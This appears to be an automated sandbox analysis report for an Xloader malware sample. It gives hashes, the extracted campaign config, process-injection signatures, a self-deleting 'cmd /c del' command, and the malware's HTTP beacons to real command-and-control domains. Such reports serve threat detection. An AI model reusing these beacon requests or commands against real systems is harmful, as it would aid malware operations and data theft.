xloader | 2940a3d00fbeae0623c4f6c3231ec29b10b3d3043a2ccbc6f05fb92220de58a8

Analysis

max time kernel
150s
max time network
147s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
24/09/2024, 01:29 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

140c2a66e6feca66598f349391e11813c91e918bad57de7422e0531ab42a6117.exe
Size

192KB
MD5

a43025a136bcc6af701054ed51ad8adb
SHA1

547032f4afb1cb3b6970ba5a64234d20e815a3a4
SHA256

140c2a66e6feca66598f349391e11813c91e918bad57de7422e0531ab42a6117
SHA512

e6c9bd2cf29cffb3d318664a9525d6d56767d4ec482b6f38861b1f01d222a73228f4e70bc12b45f700eb37513a32d64616edf09e8b4df349e9a0aa36c7fe3f81
SSDEEP

3072:l1NjcVVnLpPuqbJzk9y/Nsso8vTUa6wySNSCV1sPvhDbQh2k4hPwn0gSimGZ6P5u:HNeZFhbEaeSN91sP9baS+npwIn2nyR7

Score

10^/10

xloader 3e9r discovery loader rat

Malware Config

Extracted

Family

xloader

Version

2.5

Campaign

3e9r

Decoy

143411.com

300dh.xyz

win-chance.info

essentialsofbeauty.com

skategrindingwheels.com

jyqtgg.com

exodijuis.com

goodwinpuppies.com

doitlive.online

hello-orchid.com

shangjibbs.com

innovarecic.com

fococomunicacaovisuales.com

completemarine.care

parodistluxuryroll.com

anda568.com

unicorm.digital

weaveapp.xyz

artractions.com

app-ads-network.com

Signatures

Xloader
Xloader is a rebranded version of Formbook malware.
loader xloader

Xloader payload 4 IoCs

rat

resource	yara_rule
behavioral1/memory/1440-12-0x0000000000400000-0x0000000000429000-memory.dmp	xloader
behavioral1/memory/1440-15-0x0000000000400000-0x0000000000429000-memory.dmp	xloader
behavioral1/memory/2796-24-0x00000000000D0000-0x00000000000F9000-memory.dmp	xloader
behavioral1/memory/2316-41-0x0000000140000000-0x00000001405E8000-memory.dmp	xloader

Blocklisted process makes network request 1 IoCs

flow	pid	Process
7	2796	rundll32.exe

Executes dropped EXE 2 IoCs

pid	Process
2380	rxyzg.exe
1440	rxyzg.exe

Loads dropped DLL 2 IoCs

pid	Process
2372	140c2a66e6feca66598f349391e11813c91e918bad57de7422e0531ab42a6117.exe
2380	rxyzg.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2380 set thread context of 1440	2380	rxyzg.exe	32
PID 1440 set thread context of 1252	1440	rxyzg.exe	21
PID 2796 set thread context of 1252	2796	rundll32.exe	21

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	140c2a66e6feca66598f349391e11813c91e918bad57de7422e0531ab42a6117.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rxyzg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 50 IoCs

pid	Process
1440	rxyzg.exe
1440	rxyzg.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2796	rundll32.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2796	rundll32.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2796	rundll32.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2796	rundll32.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1252	Explorer.EXE
2316	taskmgr.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
1440	rxyzg.exe
1440	rxyzg.exe
1440	rxyzg.exe
2796	rundll32.exe
2796	rundll32.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1440	rxyzg.exe
Token: SeDebugPrivilege	2796	rundll32.exe
Token: SeShutdownPrivilege	1252	Explorer.EXE
Token: SeDebugPrivilege	2316	taskmgr.exe
Token: SeShutdownPrivilege	1252	Explorer.EXE

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
1252	Explorer.EXE
1252	Explorer.EXE
1252	Explorer.EXE
1252	Explorer.EXE
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe

Suspicious use of SendNotifyMessage 30 IoCs

pid	Process
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe
2316	taskmgr.exe

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 2372 wrote to memory of 2380	2372	140c2a66e6feca66598f349391e11813c91e918bad57de7422e0531ab42a6117.exe	31
PID 2372 wrote to memory of 2380	2372	140c2a66e6feca66598f349391e11813c91e918bad57de7422e0531ab42a6117.exe	31
PID 2372 wrote to memory of 2380	2372	140c2a66e6feca66598f349391e11813c91e918bad57de7422e0531ab42a6117.exe	31
PID 2372 wrote to memory of 2380	2372	140c2a66e6feca66598f349391e11813c91e918bad57de7422e0531ab42a6117.exe	31
PID 2380 wrote to memory of 1440	2380	rxyzg.exe	32
PID 2380 wrote to memory of 1440	2380	rxyzg.exe	32
PID 2380 wrote to memory of 1440	2380	rxyzg.exe	32
PID 2380 wrote to memory of 1440	2380	rxyzg.exe	32
PID 2380 wrote to memory of 1440	2380	rxyzg.exe	32
PID 2380 wrote to memory of 1440	2380	rxyzg.exe	32
PID 2380 wrote to memory of 1440	2380	rxyzg.exe	32
PID 1252 wrote to memory of 2796	1252	Explorer.EXE	33
PID 1252 wrote to memory of 2796	1252	Explorer.EXE	33
PID 1252 wrote to memory of 2796	1252	Explorer.EXE	33
PID 1252 wrote to memory of 2796	1252	Explorer.EXE	33
PID 1252 wrote to memory of 2796	1252	Explorer.EXE	33
PID 1252 wrote to memory of 2796	1252	Explorer.EXE	33
PID 1252 wrote to memory of 2796	1252	Explorer.EXE	33
PID 2796 wrote to memory of 2824	2796	rundll32.exe	34
PID 2796 wrote to memory of 2824	2796	rundll32.exe	34
PID 2796 wrote to memory of 2824	2796	rundll32.exe	34
PID 2796 wrote to memory of 2824	2796	rundll32.exe	34
PID 1252 wrote to memory of 2316	1252	Explorer.EXE	37
PID 1252 wrote to memory of 2316	1252	Explorer.EXE	37
PID 1252 wrote to memory of 2316	1252	Explorer.EXE	37

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1252
- C:\Users\Admin\AppData\Local\Temp\140c2a66e6feca66598f349391e11813c91e918bad57de7422e0531ab42a6117.exe
  "C:\Users\Admin\AppData\Local\Temp\140c2a66e6feca66598f349391e11813c91e918bad57de7422e0531ab42a6117.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2372
- - C:\Users\Admin\AppData\Local\Temp\rxyzg.exe
    C:\Users\Admin\AppData\Local\Temp\rxyzg.exe C:\Users\Admin\AppData\Local\Temp\mfqbqbhcqx
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2380
  - - C:\Users\Admin\AppData\Local\Temp\rxyzg.exe
      C:\Users\Admin\AppData\Local\Temp\rxyzg.exe C:\Users\Admin\AppData\Local\Temp\mfqbqbhcqx
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      PID:1440
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\SysWOW64\rundll32.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2796
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Users\Admin\AppData\Local\Temp\rxyzg.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2824
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2316

Network

DNS

www.empiredigitalcbdstore.com

rundll32.exe

Remote address:

8.8.8.8:53

Request

www.empiredigitalcbdstore.com

IN A

Response

www.empiredigitalcbdstore.com

IN CNAME

empiredigitalcbdstore.com

empiredigitalcbdstore.com

IN A

208.109.50.40
DNS

www.empiredigitalcbdstore.com

rundll32.exe

Remote address:

8.8.8.8:53

Request

www.empiredigitalcbdstore.com

IN A

Response

www.empiredigitalcbdstore.com

IN CNAME

empiredigitalcbdstore.com

empiredigitalcbdstore.com

IN A

208.109.50.40
DNS

www.securityfirstlt.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.securityfirstlt.com

IN A

Response
DNS

www.fococomunicacaovisuales.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.fococomunicacaovisuales.com

IN A

Response
DNS

www.hello-orchid.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.hello-orchid.com

IN A

Response

www.hello-orchid.com

IN CNAME

hello-orchid.com

hello-orchid.com

IN A

141.193.213.11

hello-orchid.com

IN A

141.193.213.10
GET

http://www.hello-orchid.com/3e9r/?z6A0I=/zMRSRc1QusoZhMyL5seYh8vUR/sZneXpkNDah76+U2aAU+moq3N7wS+aQamrI9O&_L30=ht80axMpghz

Explorer.EXE

Remote address:

141.193.213.11:80

Request

GET /3e9r/?z6A0I=/zMRSRc1QusoZhMyL5seYh8vUR/sZneXpkNDah76+U2aAU+moq3N7wS+aQamrI9O&_L30=ht80axMpghz HTTP/1.1
Host: www.hello-orchid.com
Connection: close

Response

HTTP/1.1 409 Conflict

Date: Tue, 24 Sep 2024 01:30:59 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 16
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 8c7f032b3db206b2-LHR
DNS

www.divinehuntbegins.net

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.divinehuntbegins.net

IN A

Response
DNS

www.okbruv.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.okbruv.com

IN A

Response
DNS

www.drone-rullime.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.drone-rullime.com

IN A

Response
DNS

www.app-ads-network.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.app-ads-network.com

IN A

Response
DNS

www.bhadrakalisandhya.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.bhadrakalisandhya.com

IN A

Response
DNS

www.anda568.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.anda568.com

IN A

Response
DNS

www.unicorm.digital

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.unicorm.digital

IN A

Response
DNS

www.parodistluxuryroll.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.parodistluxuryroll.com

IN A

Response
DNS

www.upgown.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.upgown.com

IN A

Response
DNS

www.weaveapp.xyz

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.weaveapp.xyz

IN A

Response

www.weaveapp.xyz

IN A

72.52.179.175
GET

http://www.weaveapp.xyz/3e9r/?z6A0I=OMb0Swc0jQLwT0G4jVz7nBRf9ZlnZTLoMUOnbAWMovKsVkrrW3BwWv05jkzcu3M9&_L30=ht80axMpghz

Explorer.EXE

Remote address:

72.52.179.175:80

Request

GET /3e9r/?z6A0I=OMb0Swc0jQLwT0G4jVz7nBRf9ZlnZTLoMUOnbAWMovKsVkrrW3BwWv05jkzcu3M9&_L30=ht80axMpghz HTTP/1.1
Host: www.weaveapp.xyz
Connection: close
DNS

www.iuckychance.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.iuckychance.com

IN A

Response

www.iuckychance.com

IN A

103.224.182.242
GET

http://www.iuckychance.com/3e9r/?z6A0I=2FhtQKAI4snHdNxhC1Q9u08AiwdyFbIKXXtoO9dLoHGvRzOm+bkCNxIHsK9Ouw70&_L30=ht80axMpghz

Explorer.EXE

Remote address:

103.224.182.242:80

Request

GET /3e9r/?z6A0I=2FhtQKAI4snHdNxhC1Q9u08AiwdyFbIKXXtoO9dLoHGvRzOm+bkCNxIHsK9Ouw70&_L30=ht80axMpghz HTTP/1.1
Host: www.iuckychance.com
Connection: close

Response

HTTP/1.1 200 OK

date: Tue, 24 Sep 2024 01:32:08 GMT
server: Apache
set-cookie: __tad=1727141528.7427806; expires=Fri, 22-Sep-2034 01:32:08 GMT; Max-Age=315360000
vary: Accept-Encoding
content-length: 1336
content-type: text/html; charset=UTF-8
connection: close
DNS

www.fandenacqua.quest

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.fandenacqua.quest

IN A

Response
DNS

www.exodijuis.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.exodijuis.com

IN A

Response
DNS

www.doitlive.online

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.doitlive.online

IN A

Response

www.doitlive.online

IN A

66.96.162.136
GET

http://www.doitlive.online/3e9r/?z6A0I=/3CUQAOJ7nRk6Zjj3vDq87dHxg3480VoA983q7E8rD7XD/SEfGe/4YvcCLfPkQ/H&TD=8pm4wzpx7RKt_2Mp

Explorer.EXE

Remote address:

66.96.162.136:80

Request

GET /3e9r/?z6A0I=/3CUQAOJ7nRk6Zjj3vDq87dHxg3480VoA983q7E8rD7XD/SEfGe/4YvcCLfPkQ/H&TD=8pm4wzpx7RKt_2Mp HTTP/1.1
Host: www.doitlive.online
Connection: close

Response

HTTP/1.1 404 Not Found

Date: Tue, 24 Sep 2024 01:32:26 GMT
Content-Type: text/html
Content-Length: 867
Connection: close
Server: Apache
Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
Accept-Ranges: bytes
Age: 1
DNS

www.amarbakers.online

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.amarbakers.online

IN A

Response

208.109.50.40:80

www.empiredigitalcbdstore.com

Explorer.EXE

152 B
3
208.109.50.40:80

www.empiredigitalcbdstore.com

rundll32.exe

152 B
3
141.193.213.11:80

http://www.hello-orchid.com/3e9r/?z6A0I=/zMRSRc1QusoZhMyL5seYh8vUR/sZneXpkNDah76+U2aAU+moq3N7wS+aQamrI9O&_L30=ht80axMpghz

http

Explorer.EXE

395 B
618 B
5
5

HTTP Request

GET http://www.hello-orchid.com/3e9r/?z6A0I=/zMRSRc1QusoZhMyL5seYh8vUR/sZneXpkNDah76+U2aAU+moq3N7wS+aQamrI9O&_L30=ht80axMpghz

HTTP Response

409
72.52.179.175:80

http://www.weaveapp.xyz/3e9r/?z6A0I=OMb0Swc0jQLwT0G4jVz7nBRf9ZlnZTLoMUOnbAWMovKsVkrrW3BwWv05jkzcu3M9&_L30=ht80axMpghz

http

Explorer.EXE

391 B
172 B
5
4

HTTP Request

GET http://www.weaveapp.xyz/3e9r/?z6A0I=OMb0Swc0jQLwT0G4jVz7nBRf9ZlnZTLoMUOnbAWMovKsVkrrW3BwWv05jkzcu3M9&_L30=ht80axMpghz
103.224.182.242:80

http://www.iuckychance.com/3e9r/?z6A0I=2FhtQKAI4snHdNxhC1Q9u08AiwdyFbIKXXtoO9dLoHGvRzOm+bkCNxIHsK9Ouw70&_L30=ht80axMpghz

http

Explorer.EXE

440 B
1.8kB
6
5

HTTP Request

GET http://www.iuckychance.com/3e9r/?z6A0I=2FhtQKAI4snHdNxhC1Q9u08AiwdyFbIKXXtoO9dLoHGvRzOm+bkCNxIHsK9Ouw70&_L30=ht80axMpghz

HTTP Response

200
66.96.162.136:80

http://www.doitlive.online/3e9r/?z6A0I=/3CUQAOJ7nRk6Zjj3vDq87dHxg3480VoA983q7E8rD7XD/SEfGe/4YvcCLfPkQ/H&TD=8pm4wzpx7RKt_2Mp

http

Explorer.EXE

397 B
1.3kB
5
5

HTTP Request

GET http://www.doitlive.online/3e9r/?z6A0I=/3CUQAOJ7nRk6Zjj3vDq87dHxg3480VoA983q7E8rD7XD/SEfGe/4YvcCLfPkQ/H&TD=8pm4wzpx7RKt_2Mp

HTTP Response

404

8.8.8.8:53

www.empiredigitalcbdstore.com

dns

rundll32.exe

75 B
105 B
1
1

DNS Request

www.empiredigitalcbdstore.com

DNS Response

208.109.50.40
8.8.8.8:53

www.empiredigitalcbdstore.com

dns

rundll32.exe

75 B
105 B
1
1

DNS Request

www.empiredigitalcbdstore.com

DNS Response

208.109.50.40
8.8.8.8:53

www.securityfirstlt.com

dns

Explorer.EXE

69 B
142 B
1
1

DNS Request

www.securityfirstlt.com
8.8.8.8:53

www.fococomunicacaovisuales.com

dns

Explorer.EXE

77 B
150 B
1
1

DNS Request

www.fococomunicacaovisuales.com
8.8.8.8:53

www.hello-orchid.com

dns

Explorer.EXE

66 B
112 B
1
1

DNS Request

www.hello-orchid.com

DNS Response

141.193.213.11

141.193.213.10
8.8.8.8:53

www.divinehuntbegins.net

dns

Explorer.EXE

70 B
143 B
1
1

DNS Request

www.divinehuntbegins.net
8.8.8.8:53

www.okbruv.com

dns

Explorer.EXE

60 B
133 B
1
1

DNS Request

www.okbruv.com
8.8.8.8:53

www.drone-rullime.com

dns

Explorer.EXE

67 B
140 B
1
1

DNS Request

www.drone-rullime.com
8.8.8.8:53

www.app-ads-network.com

dns

Explorer.EXE

69 B
142 B
1
1

DNS Request

www.app-ads-network.com
8.8.8.8:53

www.bhadrakalisandhya.com

dns

Explorer.EXE

71 B
144 B
1
1

DNS Request

www.bhadrakalisandhya.com
8.8.8.8:53

www.anda568.com

dns

Explorer.EXE

61 B
134 B
1
1

DNS Request

www.anda568.com
8.8.8.8:53

www.unicorm.digital

dns

Explorer.EXE

65 B
133 B
1
1

DNS Request

www.unicorm.digital
8.8.8.8:53

www.parodistluxuryroll.com

dns

Explorer.EXE

72 B
145 B
1
1

DNS Request

www.parodistluxuryroll.com
8.8.8.8:53

www.upgown.com

dns

Explorer.EXE

60 B
133 B
1
1

DNS Request

www.upgown.com
8.8.8.8:53

www.weaveapp.xyz

dns

Explorer.EXE

62 B
78 B
1
1

DNS Request

www.weaveapp.xyz

DNS Response

72.52.179.175
8.8.8.8:53

www.iuckychance.com

dns

Explorer.EXE

65 B
81 B
1
1

DNS Request

www.iuckychance.com

DNS Response

103.224.182.242
8.8.8.8:53

www.fandenacqua.quest

dns

Explorer.EXE

67 B
132 B
1
1

DNS Request

www.fandenacqua.quest
8.8.8.8:53

www.exodijuis.com

dns

Explorer.EXE

63 B
136 B
1
1

DNS Request

www.exodijuis.com
8.8.8.8:53

www.doitlive.online

dns

Explorer.EXE

65 B
81 B
1
1

DNS Request

www.doitlive.online

DNS Response

66.96.162.136
8.8.8.8:53

www.amarbakers.online

dns

Explorer.EXE

67 B
132 B
1
1

DNS Request

www.amarbakers.online

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8u7tt4ey32b

Filesize
163KB

MD5
4b647b9910011c7dcb6efcdf177f4c4a

SHA1
cf59b74c1bec81062866e3327bf057fdbadd8eab

SHA256
09bdf441425a65d105404065b4feaa4c231a7d5ea21bf9b3b832c30ed6ee053e

SHA512
5fece077b9fb7b1fe1646e0a31a6cc5ec246dcb13229caac5838c1ef277eef4cee5ba2b2d013c37eeab7d55ba8d38c92c9684a05b63456b93104a37302c4c234

Download Submit
C:\Users\Admin\AppData\Local\Temp\mfqbqbhcqx

Filesize
4KB

MD5
2ce8643c23d1bc7f420bdde0683c28ee

SHA1
c84271354bceeededc251467eae7cab0f2c3636c

SHA256
c4c7b8ac8e31d6d252b19de0bebaf27e31e0c5c2200c9be94eaecfed81db601c

SHA512
6319803d938cd42e7f434cfdcf71f547db70d77493d3c5010cb82371d12a156704bf0e554e5d88d7bbe591cb0dd03c7812b0e159ec3e29d2117e560802eb3b63

Download Submit
\Users\Admin\AppData\Local\Temp\rxyzg.exe

Filesize
3KB

MD5
64d3f2b2a7c95bc7051051fe34620dc3

SHA1
1a089f830583bca8aae69330a9e4946bbe03fb4f

SHA256
d1595a226a32172f214ff69b964281ef663079b6467cffa98edc6064a9f69ab6

SHA512
af6b303b98765034f886e8bc9889f829a0265bde7559b9e738ff310be6747be083c377fecc76a007d2f464907bff80c6acfc90abf7f46a1408438554a01bff7e

Download Submit
memory/1252-25-0x0000000005710000-0x00000000057D2000-memory.dmp

Filesize
776KB

Download
memory/1252-28-0x0000000006FF0000-0x00000000070FD000-memory.dmp

Filesize
1.1MB

Download
memory/1252-27-0x0000000004070000-0x0000000004170000-memory.dmp

Filesize
1024KB

Download
memory/1252-17-0x0000000005710000-0x00000000057D2000-memory.dmp

Filesize
776KB

Download
memory/1440-12-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1440-15-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/2316-41-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2316-42-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2316-44-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2380-11-0x00000000001C0000-0x00000000001C2000-memory.dmp

Filesize
8KB

Download
memory/2796-21-0x0000000000120000-0x000000000012E000-memory.dmp

Filesize
56KB

Download
memory/2796-23-0x0000000000120000-0x000000000012E000-memory.dmp

Filesize
56KB

Download
memory/2796-24-0x00000000000D0000-0x00000000000F9000-memory.dmp

Filesize
164KB

Download
memory/2796-20-0x0000000000120000-0x000000000012E000-memory.dmp

Filesize
56KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.